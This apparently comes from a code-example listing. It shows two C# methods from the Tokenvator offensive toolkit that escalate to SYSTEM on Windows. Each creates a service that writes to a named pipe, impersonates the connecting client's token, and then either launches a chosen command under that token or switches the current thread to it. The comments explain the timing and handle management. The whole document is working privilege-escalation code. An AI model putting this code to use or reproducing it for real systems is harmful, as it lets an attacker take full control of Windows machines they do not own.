예제 #1
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
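        /// <summary>
        /// Obtains a token from the "Tokenvator" named pipe (a SYSTEM token, going by
        /// the method name) and launches <paramref name="command"/> under it.
        /// The pipe listener runs on a background thread; the service side is only
        /// started after <c>waitHandle</c> is signalled, so the pipe exists by the
        /// time the service command tries to write to it.
        /// </summary>
        /// <param name="command">Image to launch with the obtained token.</param>
        /// <param name="arguments">Command line handed to the new process.</param>
        /// <remarks>
        /// Reads the static <c>hToken</c> that <c>_GetPipeToken</c> fills in. Unlike
        /// the parameterless overload, this one does not close or reset
        /// <c>hToken</c> afterwards. The pipe name and the service command string are
        /// fixed literals (both contain "Tokenvator").
        /// </remarks>
        internal static void GetSystem(String command, String arguments)
        {
            Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));

            using (PSExec psExec = new PSExec("Tokenvator"))
            {
                psExec.Connect(".");
                psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
                psExec.Open();
                // Order matters: the listener must be up (waitHandle set by the
                // thread) before the service is started, otherwise the client
                // write has no pipe to connect to.
                thread.Start();
                waitHandle.WaitOne();
                psExec.Start();
                psExec.Stop();
            }

            thread.Join();

            // The listener may have finished without producing a token (no client
            // connected, or the token could not be obtained). The parameterless
            // overload guards on this; do the same here rather than passing a null
            // handle to the CreateProcessWith*W call below.
            if (IntPtr.Zero == hToken)
            {
                Console.WriteLine("[-] No token was obtained from the pipe client");
                return;
            }

            Create createProcess;

            // Session 0 selects the LogonW variant, any other session the TokenW
            // variant. Presumably chosen because the TokenW path needs an
            // interactive session - confirm against the Create delegates.
            if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
            {
                createProcess = CreateProcess.CreateProcessWithLogonW;
            }
            else
            {
                createProcess = CreateProcess.CreateProcessWithTokenW;
            }
            createProcess(hToken, command, arguments);
        }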
예제 #2
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Obtains a token from the "Tokenvator" named pipe (a SYSTEM token, going by
        /// the method name) and switches the current thread to it via
        /// <c>ImpersonateLoggedOnUser</c>. The pipe listener runs on a background
        /// thread; the service side is only started after <c>waitHandle</c> is
        /// signalled, so the pipe exists by the time the service command writes to it.
        /// </summary>
        /// <remarks>
        /// Reads the static <c>hToken</c> that <c>_GetPipeToken</c> fills in. On
        /// success the handle is closed and the field reset to <c>IntPtr.Zero</c>;
        /// if no token was obtained the method silently does nothing. The pipe name
        /// and the service command string are fixed literals (both contain
        /// "Tokenvator").
        /// </remarks>
        internal static void GetSystem()
        {
            Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));

            using (PSExec psExec = new PSExec("Tokenvator"))
            {
                psExec.Connect(".");
                psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
                psExec.Open();
                // Order matters: the listener must be up (waitHandle set by the
                // thread) before the service is started, otherwise the client
                // write has no pipe to connect to.
                thread.Start();
                waitHandle.WaitOne();
                psExec.Start();
                psExec.Stop();
            }

            thread.Join();

            // Only act when the listener actually produced a token; the return
            // value of ImpersonateLoggedOnUser is not checked, so the printed
            // identity is the only indication of whether impersonation took effect.
            if (IntPtr.Zero != hToken)
            {
                advapi32.ImpersonateLoggedOnUser(hToken);
                // The impersonation keeps its own reference; the raw handle is no
                // longer needed once the thread token is set.
                kernel32.CloseHandle(hToken);
                Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
                hToken = IntPtr.Zero;
            }
        }